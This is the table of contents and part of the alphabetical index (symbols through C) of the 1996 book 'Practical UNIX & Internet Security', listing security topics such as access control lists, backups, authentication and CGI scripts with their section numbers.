
Practical UNIX & Internet Security

By Simson Garfinkel & Gene Spafford; ISBN 1-56592-148-8, 1004 pages.

Second Edition, April 1996.

(See the catalog page for this book.)

Index

Table of Contents

Preface

Part I: Computer Security Basics

Chapter 1: Introduction

Chapter 2: Policies and Guidelines

Part II: User Responsibilities

Chapter 3: Users and Passwords

Chapter 4: Users, Groups, and the Superuser

Chapter 5: The UNIX Filesystem

Chapter 6: Cryptography

Part III: System Security

Chapter 7: Backups

Chapter 8: Defending Your Accounts

Chapter 9: Integrity Management

Chapter 10: Auditing and Logging

Chapter 11: Protecting Against Programmed Threats

Chapter 12: Physical Security

Chapter 13: Personnel Security

Part IV: Network and Internet Security

Chapter 14: Telephone Security

Chapter 15: UUCP

Chapter 16: TCP/IP Networks

Chapter 17: TCP/IP Services

Chapter 18: WWW Security

Chapter 19: RPC, NIS, NIS+, and Kerberos

Chapter 20: NFS

Part V: Advanced Topics

Chapter 21: Firewalls

Chapter 22: Wrappers and Proxies

Chapter 23: Writing Secure SUID and Network Programs

Part VI: Handling Security Incidents

Chapter 24: Discovering a Break-in

Chapter 25: Denial of Service Attacks and Solutions

Chapter 26: Computer Security and U.S. Law

Chapter 27: Who Do You Trust?

Part VII: Appendixes

Appendix A: UNIX Security Checklist

Appendix B: Important Files

Appendix C: UNIX Processes

Appendix D: Paper Sources

Appendix E: Electronic Resources

Appendix F: Organizations

Appendix G: Table of IP Services

Copyright © 1999 O'Reilly & Associates. All Rights Reserved.


Index: Symbols and Numbers

10BaseT networks

12.3.1.2. Eavesdropping by Ethernet and 10Base-T

16.1. Networking

8mm video tape : 7.1.4. Guarding Against Media Failure

@ (at sign)

with chacl command : 5.2.5.2. HP-UX access control lists

in xhost list : 17.3.21.3. The xhost facility

! and mail command : 15.1.3. mail Command

. (dot) directory : 5.1.1. Directories

.. (dot-dot) directory : 5.1.1. Directories

# (hash mark), disabling services with : 17.3. Primary UNIX Network Services

+ (plus sign)

in hosts.equiv file : 17.3.18.5. Searching for .rhosts files

in NIS

19.4. Sun's Network Information Service (NIS)

19.4.4.6. NIS is confused about "+"

/ (slash)

IFS separator : 11.5.1.2. IFS attacks

root directory

5.1.1. Directories

(see also root directory)

~ (tilde)

in automatic backups : 18.2.3.5. Beware stray CGI scripts

for home directory : 11.5.1.3. $HOME attacks

Index: A

absolute pathnames : 5.1.3. Current Directory and Paths<br />

access<br />

/etc/exports file : 20.2.1.1. /etc/exports<br />

levels, NIS+ : 19.5.4. Using NIS+<br />

by non-citizens : 26.4.1. Munitions Export<br />

tradition of open : 1.4.1. Expectations<br />

via Web : 18.2.2.2. Additional configuration issues<br />

access control : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

ACLs<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

anonymous FTP : 17.3.2.1. Using anonymous FTP<br />

<strong>Internet</strong> servers : 17.2. Controlling Access to Servers<br />

monitoring employee access : 13.2.4. Auditing Access<br />

physical : 12.2.3. Physical Access<br />

restricted filesystems<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

restricting data availability : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

USERFILE (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

Web server files<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

X Window System<br />

17.3.21.2. X security<br />

17.3.21.3. The xhost facility<br />

access control lists : (see ACLs)<br />

access.conf file : 18.3.1. The access.conf and .htaccess Files<br />

access() : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

access_log file<br />

10.3.5. access_log Log File<br />

18.4.2. Eavesdropping Through Log Files<br />

with refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

accidents<br />

12.2.2. Preventing Accidents<br />

(see also natural disasters)<br />

accounting process<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

(see also auditing)<br />

accounts : 3.1. Usernames<br />

aliases for : 8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

changing login shell<br />

8.4.2. Changing the Account's Login Shell<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

created by intruders : 24.4.1. New Accounts<br />

default : 8.1.2. Default Accounts<br />

defense checklist : A.1.1.7. Chapter 8: Defending Your Accounts<br />

dormant<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

expiring old : 8.4.3. Finding Dormant Accounts<br />

group : 8.1.6. Group Accounts<br />

importing to NIS server<br />

19.4.1. Including or excluding specific accounts:

19.4.4.2. Using netgroups to limit the importing of accounts

Joes

3.6.2. Smoking Joes

8.8.3.1. Joetest: a simple password cracker

locking automatically : 3.3. Entering Your Password<br />

logging changes to : 10.7.2.1. Exception and activity reports<br />

multiple, same UID : 4.1.2. Multiple Accounts with the Same UID<br />

names for : (see usernames)<br />

restricted, with rsh : 8.1.4.5. How to set up a restricted account with rsh<br />

restricting FTP from : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

running single command : 8.1.3. Accounts That Run a Single Command<br />

without passwords : 8.1.1. Accounts Without Passwords<br />

acct file : 10.2. The acct/pacct Process Accounting File<br />

acctcom program<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.2. Accounting with BSD<br />

ACEs : (see ACLs)<br />

ACK bit : 16.2.4.2. TCP<br />

acledit command : 5.2.5.1. AIX Access Control Lists<br />

aclget, aclput commands : 5.2.5.1. AIX Access Control Lists<br />

ACLs (access control lists)<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

errors in : 5.2.5.1. AIX Access Control Lists<br />

NNTP with : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

ACM (Association for Computing Machinery) : F.1.1. Association for Computing Machinery (ACM)<br />

active FTP : 17.3.2.2. Passive vs. active FTP<br />

aculog file : 10.3.1. aculog File<br />

adaptive modems : (see modems)<br />

adb debugger<br />

19.3.1.3. Setting the window<br />

C.4. The kill Command<br />

add-on functionality : 1.4.3. Add-On Functionality Breeds Problems<br />

addresses<br />

CIDR : 16.2.1.3. CIDR addresses<br />

commands embedded in : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

Internet

16.2.1. Internet Addresses

16.2.1.3. CIDR addresses<br />

IP : (see IP addresses)<br />

Adleman, Leonard<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

.Admin directory : 10.3.4. uucp Log Files<br />

administration : (see system administration)<br />

adult material : 26.4.5. Pornography and Indecent Material<br />

Advanced Network & Services (ANS) : F.3.4.2. ANS customers<br />

AFCERT : F.3.4.41. U.S. Air Force<br />

aftpd server : 17.3.2.4. Setting up an FTP server<br />

agent (user) : 4.1. Users and Groups<br />

agent_log file : 18.4.2. Eavesdropping Through Log Files<br />

aging : (see expiring)<br />

air ducts : 12.2.3.2. Entrance through air ducts<br />

air filters : 12.2.1.3. Dust<br />

Air Force Computer Emergency Response Team (AFCERT) : F.3.4.41. U.S. Air Force<br />

AIX<br />

3.3. Entering Your Password<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

access control lists : 5.2.5.1. AIX Access Control Lists<br />

tftp access : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

trusted path : 8.5.3.1. Trusted path<br />

alarms : (see detectors)<br />

aliases<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

decode : 17.3.4.2. Using sendmail to receive email<br />

mail : 17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

AllowOverride option : 18.3.2. Commands Within the Block<br />

American Society for Industrial <strong>Sec</strong>urity (ASIS) : F.1.2. American Society for Industrial <strong>Sec</strong>urity (ASIS)<br />

ancestor directories : 9.2.2.2. Ancestor directories<br />

ANI schemes : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

animals : 12.2.1.7. Bugs (biological)<br />

anlpasswd package : 8.8.2. Constraining Passwords<br />

anon option for /etc/exports : 20.2.1.1. /etc/exports<br />

anonymous FTP<br />

4.1. Users and Groups<br />

17.3.2.1. Using anonymous FTP<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

and HTTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

ANS (Advanced Network & Services, Inc.) : F.3.4.2. ANS customers<br />

ANSI C standards : 1.4.2. Software Quality<br />

answer mode : 14.3.1. Originate and Answer<br />

answer testing : 14.5.3.2. Answer testing<br />

answerback terminal mode : 11.1.4. Trojan Horses<br />

APOP option (POP) : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

Apple CORES (Computer Response Squad) : F.3.4.3. Apple Computer worldwide R&D community<br />

Apple Macintosh, Web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

applets : 11.1.5. Viruses<br />

application-level encryption : 16.3.1. Link-level <strong>Sec</strong>urity<br />

applications, CGI : (see CGI, scripts)<br />

ar program : 7.4.2. Simple Archives<br />

architecture, room : 12.2.3. Physical Access<br />

archiving information<br />

7.1.1.1. A taxonomy of computer failures<br />

(see also logging)<br />

arguments, checking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

ARPA (Advanced Research Projects Agency)<br />

1.3. History of <strong>UNIX</strong><br />

(see also <strong>UNIX</strong>, history of)<br />

ARPANET network : 16.1.1. The <strong>Internet</strong><br />

ASIS (American Society for Industrial <strong>Sec</strong>urity) : F.1.2. American Society for Industrial <strong>Sec</strong>urity (ASIS)<br />

assert macro : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

assessing risks<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

assets, identifying : 2.2.1.1. Identifying assets<br />

ASSIST : F.3.4.42. U.S. Department of Defense<br />

Association for Computing Machinery (ACM) : F.1.1. Association for Computing Machinery (ACM)<br />

asymmetric key cryptography : 6.4. Common Cryptographic Algorithms<br />

asynchronous systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

Asynchronous Transfer Mode (ATM) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

at program<br />

11.5.3.4. The at program<br />

25.2.1.2. System overload attacks<br />

AT&T System V : (see System V <strong>UNIX</strong>)<br />

Athena : (see Kerberos system)<br />

atime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

ATM (Asynchronous Transfer Mode) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

attacks : (see threats)<br />

audio device : 23.8. Picking a Random Seed<br />

audit IDs<br />

4.3.3. Other IDs<br />

10.1. The Basic Log Files<br />

auditing<br />

10. Auditing and Logging<br />

(see also logging)<br />

C2 audit : 10.1. The Basic Log Files<br />

checklist for : A.1.1.9. Chapter 10: Auditing and Logging<br />

employee access : 13.2.4. Auditing Access<br />

login times : 10.1.1. lastlog File<br />

system activity : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

user activity : 4.1.2. Multiple Accounts with the Same UID<br />

who is logged in<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

AUTH_DES authentication : 19.2.2.3. AUTH_DES<br />

AUTH_KERB authentication : 19.2.2.4. AUTH_KERB<br />

AUTH_NONE authentication : 19.2.2.1. AUTH_NONE<br />

AUTH_<strong>UNIX</strong> authentication : 19.2.2.2. AUTH_<strong>UNIX</strong><br />

authd service : 23.3. Tips on Writing Network Programs<br />

authdes_win variable : 19.3.1.3. Setting the window<br />

authentication : 3.2.3. Authentication<br />

ID services : 16.3.3. Authentication<br />

Kerberos<br />

19.6.1. Kerberos Authentication<br />

19.6.1.4. Kerberos 4 vs. Kerberos 5<br />

of logins : 17.3.5. TACACS (UDP Port 49)<br />

message digests<br />

6.5.2. Using Message Digests<br />

9.2.3. Checksums and Signatures<br />

23.5.1. Use Message Digests for Storing Passwords<br />

NIS+ : 19.5.4. Using NIS+<br />

RPCs<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

<strong>Sec</strong>ure RPC : 19.3.1. <strong>Sec</strong>ure RPC Authentication<br />

security standard for : 2.4.2. Standards<br />

for Web use : 18.3.3. Setting Up Web Users and Passwords<br />

xhost facility : 17.3.21.3. The xhost facility<br />

authenticators : 3.1. Usernames<br />

AuthGroupFile option : 18.3.2. Commands Within the Block<br />

authors of programmed threats : 11.3. Authors<br />

AuthRealm option : 18.3.2. Commands Within the Block<br />

AuthType option : 18.3.2. Commands Within the Block<br />

AuthUserFile option : 18.3.2. Commands Within the Block<br />

Auto_Mounter table (NIS+) : 19.5.3. NIS+ Tables<br />

autologout shell variable : 12.3.5.1. Built-in shell autologout<br />

Automated Systems Incident Response Capability (NASA) : F.3.4.24. NASA: NASA-wide<br />

automatic<br />

11.5.3. Abusing Automatic Mechanisms<br />

(see also at program; cron file)<br />

account lockout : 3.3. Entering Your Password<br />

backups system : 7.3.2. Building an Automatic Backup System<br />

cleanup scripts (UUCP) : 15.6.2. Automatic Execution of Cleanup Scripts<br />

directory listings (Web) : 18.2.2.2. Additional configuration issues<br />

disabling of dormant accounts : 8.4.3. Finding Dormant Accounts<br />

logging out : 12.3.5.1. Built-in shell autologout<br />

mechanisms, abusing<br />

11.5.3. Abusing Automatic Mechanisms<br />

11.5.3.6. Other files<br />

password generation : 8.8.4. Password Generators<br />

power cutoff : (see detectors)<br />

sprinkler systems : 12.2.1.1. Fire<br />

wtmp file pruning : 10.1.3.1. Pruning the wtmp file<br />

auxiliary (printer) ports : 12.3.1.4. Auxiliary ports on terminals<br />

awareness, security : (see security, user awareness of)<br />

awk scripts<br />

11.1.4. Trojan Horses<br />

11.5.1.2. IFS attacks<br />

Index: B

back doors<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

6.2.3. Cryptographic Strength<br />

11.1. Programmed Threats: Definitions<br />

11.1.2. Back Doors and Trap Doors<br />

11.5. Protecting Yourself<br />

27.1.2. Trusting Trust<br />

in MUDs and IRCs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

background checks, employee : 13.1. Background Checks<br />

backquotes in CGI input<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

BACKSPACE key : 3.4. Changing Your Password<br />

backup program : 7.4.3. Specialized Backup Programs<br />

backups<br />

7. Backups<br />

7.4.7. inode Modification Times<br />

9.1.2. Read-only Filesystems<br />

24.2.2. What to Do When You Catch Somebody<br />

across networks : 7.4.5. Backups Across the Net<br />

for archiving information : 7.1.1.1. A taxonomy of computer failures<br />

automatic<br />

7.3.2. Building an Automatic Backup System<br />

18.2.3.5. Beware stray CGI scripts<br />

checklist for : A.1.1.6. Chapter 7: Backups<br />

criminal investigations and : 26.2.4. Hazards of Criminal Prosecution<br />

of critical files<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

encrypting<br />

7.4.4. Encrypting Your Backups<br />

12.3.2.4. Backup encryption<br />

hardcopy : 24.5.1. Never Trust Anything Except Hardcopy<br />

keeping secure<br />

2.4.2. Standards<br />

2.4.3. Guidelines<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

26.2.6. Other Tips<br />

laws concerning : 7.1.7. Legal Issues<br />

of log files : 10.2.2. Accounting with BSD<br />

retention of<br />

7.1.5. How Long Should You Keep a Backup?<br />

7.2. Sample Backup Strategies<br />

7.2.5. Deciding upon a Backup Strategy<br />

rotating media : 7.1.3. Types of Backups<br />

software for<br />

7.4. Software for Backups<br />

7.4.7. inode Modification Times<br />

commercial : 7.4.6. Commercial Offerings<br />

special programs for : 7.4.3. Specialized Backup Programs<br />

strategies for<br />

7.2. Sample Backup Strategies<br />

7.2.5. Deciding upon a Backup Strategy<br />

10.8. Managing Log Files<br />

theft of<br />

12.3.2. Protecting Backups<br />

12.3.2.4. Backup encryption<br />

verifying : 12.3.2.1. Verify your backups<br />

zero-filled bytes in : 7.4. Software for Backups<br />

bacteria

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

BADSU attempts : (see sulog file)<br />

Baldwin, Robert : 6.6.1.1. The crypt program<br />

bang (!) and mail command : 15.1.3. mail Command<br />

Bash shell (bsh) : 8.1.4.4. No restricted bash<br />

Basic Networking Utilities : (see BNU UUCP)<br />

bastion hosts : 21.1.3. Anatomy of a Firewall<br />

batch command : 25.2.1.2. System overload attacks<br />

batch jobs : (see cron file)<br />

baud : 14.1. Modems: Theory of Operation<br />

bell (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

Bellcore : F.3.4.5. Bellcore<br />

Berkeley <strong>UNIX</strong> : (see BSD <strong>UNIX</strong>)<br />

Berkeley's sendmail : (see sendmail)<br />

bidirectionality<br />

14.1. Modems: Theory of Operation<br />

14.4.1. One-Way Phone Lines<br />

bigcrypt algorithm : 8.6.4. Crypt16() and Other Algorithms<br />

/bin directory<br />

11.1.5. Viruses<br />

11.5.1.1. PATH attacks<br />

backing up : 7.1.2. What Should You Back Up?<br />

/bin/csh : (see csh)<br />

/bin/ksh : (see ksh)<br />

/bin/login : (see login program)<br />

/bin/passwd : (see passwd command)<br />

/bin/sh : (see sh)<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

binary code : 11.1.5. Viruses<br />

bind system call<br />

16.2.6.1. DNS under <strong>UNIX</strong><br />

17.1.3. The /etc/inetd Program<br />

biological threats : 12.2.1.7. Bugs (biological)<br />

block devices : 5.6. Device Files<br />

block send commands : 11.1.4. Trojan Horses<br />

blocking systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

BNU UUCP<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.3. uucheck: Checking Your Permissions File<br />

Boeing CERT : F.3.4.5. Bellcore<br />

bogusns directive : 17.3.6.2. DNS nameserver attacks<br />

boot viruses : 11.1.5. Viruses<br />

Bootparams table (NIS+) : 19.5.3. NIS+ Tables<br />

Bourne shell (sh)

C.5.3. Running the User's Shell

(see also sh program; shells)

bps (bits per second) : 14.1. Modems: Theory of Operation<br />

BREAK key : 14.5.3.2. Answer testing<br />

breakins<br />

checklist for : A.1.1.23. Chapter 24: Discovering a Break-in<br />

legal options following : 26.1. Legal Options After a Break-in<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

resuming operation after : 24.6. Resuming Operation<br />

broadcast storm : 25.3.2. Message Flooding<br />

browsers : (see Web browsers)<br />

BSD <strong>UNIX</strong><br />

Which <strong>UNIX</strong> System?<br />

1.3. History of <strong>UNIX</strong><br />

accounting with : 10.2.2. Accounting with BSD<br />

Fast Filesystem (FFS) : 25.2.2.6. Reserved space<br />

groups and : 4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

immutable files : 9.1.1. Immutable and Append-Only Files<br />

modems and : 14.5.1. Hooking Up a Modem to Your Computer<br />

programming references : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

ps command with : C.1.2.2. Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

published resources for : D.1. <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

restricted shells : 8.1.4.2. Restricted shells under Berkeley versions<br />

SUID files, list of : B.3. SUID and SGID Files<br />

sulog log under : 4.3.7.1. The sulog under Berkeley <strong>UNIX</strong><br />

utmp and wtmp files : 10.1.2. utmp and wtmp Files<br />

BSD/OS (operating system) : 1.3. History of <strong>UNIX</strong><br />

bsh (Bash shell) : 8.1.4.4. No restricted bash<br />

BSI/GISA : F.3.4.15. Germany: government institutions<br />

buffers

checking boundaries : 23.2. Tips on Avoiding Security-related Bugs

for editors : 11.1.4. Trojan Horses

bugs

1.1. What Is Computer Security?

1.4.2. Software Quality

23.1.2.1. What they found

27.2.3. Buggy Software

27.2.5. Security Bugs that Never Get Fixed

Bugtraq mailing list : E.1.3.3. Bugtraq<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

hardware : 27.2.1. Hardware Bugs<br />

.htaccess file : 18.3.1. The access.conf and .htaccess Files<br />

keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

tips on avoiding : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

bugs (biological) : 12.2.1.7. Bugs (biological)<br />

bugs<br />

Preface<br />

(see also security holes)<br />

bulk erasers : 12.3.2.3. Sanitize your media before disposal<br />

byte-by-byte comparisons<br />

9.2.1. Comparison Copies<br />

9.2.1.3. rdist<br />

bytes, zero-filled : 7.4. Software for Backups<br />

Index: C

C programming language<br />

1.3. History of <strong>UNIX</strong><br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

-Wall compiler option : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C shell : (see csh)<br />

C2 audit : 10.1. The Basic Log Files<br />

cables, network<br />

12.2.4.2. Network cables<br />

12.3.1.5. Fiber optic cable<br />

cutting : 25.1. Destructive Attacks<br />

tampering detectors for : 12.3.1.1. Wiretapping<br />

wiretapping : 12.3.1.1. Wiretapping<br />

cache, nameserver : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

caching : 5.6. Device Files<br />

Caesar Cipher : 6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

calculating costs of losses : 2.3.1. The Cost of Loss<br />

call forwarding : 14.5.4. Physical Protection of Modems<br />

Call Trace : 24.2.4. Tracing a Connection<br />

CALLBACK= command : 15.5.2. Permissions Commands<br />

callbacks<br />

14.4.2.<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

BNU UUCP : 15.5.2. Permissions Commands<br />

Version 2 UUCP : 15.4.1.5. Requiring callback<br />

Caller-ID (CNID)<br />

14.4.3. Caller-ID (CNID)<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

24.2.4. Tracing a Connection<br />

Canada, export control in : 6.7.2. Cryptography and Export Controls<br />

carbon monoxide : 12.2.1.2. Smoke<br />

caret (^) in encrypted messages : 6.2. What Is Encryption?<br />

case in usernames : 3.1. Usernames<br />

cat command<br />

3.2.2. The /etc/passwd File and Network Databases<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

-ve option : 5.5.4.1. The ncheck command<br />

-v option : 24.4.1.7. Hidden files and directories<br />

cat-passwd command : 3.2.2. The /etc/passwd File and Network Databases<br />

CBC (cipher block chaining)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

CBW (Crypt Breaker's Workbench) : 6.6.1.1. The crypt program<br />

CCTA IT <strong>Sec</strong>urity & Infrastructure Group : F.3.4.39. UK: other government departments and agencies<br />

CD-ROM : 9.1.2. Read-only Filesystems<br />

CDFs (context-dependent files)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

ceilings, dropped : 12.2.3.1. Raised floors and dropped ceilings<br />

cellular telephones : 12.2.1.8. Electrical noise<br />

CERCUS (Computer Emergency Response Committee for Unclassified Systems) : F.3.4.36. TRW network area and system administrators

Cerf, Vint : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

CERN : E.4.1. CERN HTTP Daemon<br />

CERT (Computer Emergency Response Team)<br />

6.5.2. Using Message Digests<br />

27.3.5. Response Personnel?<br />

F.3.4.1. All <strong>Internet</strong> sites<br />

CERT-NL (Netherlands) : F.3.4.25. Netherlands: SURFnet-connected sites<br />

mailing list for : E.1.3.4. CERT-advisory<br />

CFB (cipher feedback) : 6.4.4.2. DES modes<br />

CGI (Common Gateway Interface) : 18.1. <strong>Sec</strong>urity and the World Wide Web<br />

scripts<br />

18.2. Running a <strong>Sec</strong>ure Server<br />

18.2.3. Writing <strong>Sec</strong>ure CGI Scripts and Programs<br />

18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

cgi-bin directory : 18.2.2. Understand Your Server's Directory Structure<br />

chacl command : 5.2.5.2. HP-UX access control lists<br />

-f option : 5.2.5.2. HP-UX access control lists<br />

-r option : 5.2.5.2. HP-UX access control lists<br />

change detection<br />

9.2. Detecting Change<br />

9.3. A Final Note<br />

character devices : 5.6. Device Files<br />

chat groups, harassment via : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

chdir command<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

25.2.2.8. Tree-structure attacks<br />

checklists for detecting changes<br />

9.2.2. Checklists and Metadata<br />

9.2.3. Checksums and Signatures<br />

checksums<br />

6.5.5.1. Checksums<br />

9.2.3. Checksums and Signatures<br />

Chesson, Greg : 15.2. Versions of UUCP<br />

chfn command : 8.2. Monitoring File Format<br />

chgrp command : 5.8. chgrp: Changing a File's Group<br />

child processes : C.2. Creating Processes<br />

chkey command : 19.3.1.1. Proving your identity<br />

chmod command<br />

5.2.1. chmod: Changing a File's Permissions<br />

5.2.4. Using Octal File Permissions<br />

8.3. Restricting Logins<br />

-A option : 5.2.5.2. HP-UX access control lists<br />

-f option : 5.2.1. chmod: Changing a File's Permissions<br />

-h option : 5.2.1. chmod: Changing a File's Permissions<br />

-R option : 5.2.1. chmod: Changing a File's Permissions<br />

chokes : (see firewalls)<br />

chown command<br />

5.7. chown: Changing a File's Owner<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

chroot system call<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

11.1.4. Trojan Horses<br />

23.4.1. Using chroot()<br />

with anonymous FTP : 17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

chrootuid daemon : E.4.2. chrootuid<br />

chsh command : 8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

CIAC (Computer Incident Advisory Capability) : F.3.4.43. U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE contractors

CIDR (Classless InterDomain Routing)<br />

16.2.1.1. IP networks<br />

16.2.1.3. CIDR addresses<br />

cigarettes : 12.2.1.2. Smoke<br />

cipher<br />

6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

(see also cryptography; encryption)<br />

block chaining (CBC)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

ciphertext<br />

6.2. What Is Encryption?<br />

8.6.1. The crypt() Algorithm<br />

feedback (CFB) : 6.4.4.2. DES modes<br />

CISCO : F.3.4.8. CISCO Systems<br />

civil actions (lawsuits) : 26.3. Civil Actions<br />

classified data and breakins<br />

26.1. Legal Options After a Break-in<br />

26.2.2. Federal Jurisdiction<br />

Classless InterDomain Routing (CIDR)<br />

16.2.1.1. IP networks<br />

16.2.1.3. CIDR addresses<br />

clear text : 8.6.1. The crypt() Algorithm<br />

Clear to Send (CTS) : 14.3. The RS-232 Serial Protocol<br />

client flooding : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

client/server model : 16.2.5. Clients and Servers<br />

clients, NIS : (see NIS)<br />

clock, system<br />

5.1.5. File Times<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

for random seeds : 23.8. Picking a Random Seed<br />

resetting : 9.2.3. Checksums and Signatures<br />

<strong>Sec</strong>ure RPC timestamp : 19.3.1.3. Setting the window<br />

clogging : 25.3.4. Clogging<br />

CMW (Compartmented-Mode Workstation) : "<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

CNID (Caller-ID)<br />

14.4.3. Caller-ID (CNID)<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

24.2.4. Tracing a Connection<br />

CO2 system (for fires) : 12.2.1.1. Fire<br />

COAST (Computer Operations, Audit, and <strong>Sec</strong>urity Technology)<br />

E.3.2. COAST<br />

E.4. Software Resources<br />

code breaking : (see cryptography)<br />

codebooks : 8.7.3. Code Books<br />

CodeCenter : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

cold, extreme : 12.2.1.6. Temperature extremes<br />

command shells : (see shells)<br />

commands<br />

8.1.3. Accounts That Run a Single Command<br />

(see also under specific command name)<br />

accounts running single : 8.1.3. Accounts That Run a Single Command<br />

in addresses : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

editor, embedded : 11.5.2.7. Other initializations<br />

remote execution of<br />

15.1.2. uux Command<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

17.3.17. rexec (TCP Port 512)<br />

running simultaneously<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also multitasking)<br />

commands in blocks : 18.3.2. Commands Within the Block<br />

COMMANDS= command : 15.5.2. Permissions Commands<br />

commenting out services : 17.3. Primary <strong>UNIX</strong> Network Services<br />

comments in BNU UUCP : 15.5.1.3. A Sample Permissions file<br />

Common Gateway Interface : (see CGI)<br />

communications<br />

modems : (see modems)<br />

national telecommunications : 26.2.2. Federal Jurisdiction<br />

threatening : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

comparison copies<br />

9.2.1. Comparison Copies<br />

9.2.1.3. rdist<br />

compress program : 6.6.1.2. Ways of improving the security of crypt<br />

Compressed SLIP (CSLIP) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

Computer Emergency Response Committee for Unclassified Systems (CERCUS) : F.3.4.36. TRW network area and system administrators

Computer Emergency Response Team : (see CERT)<br />

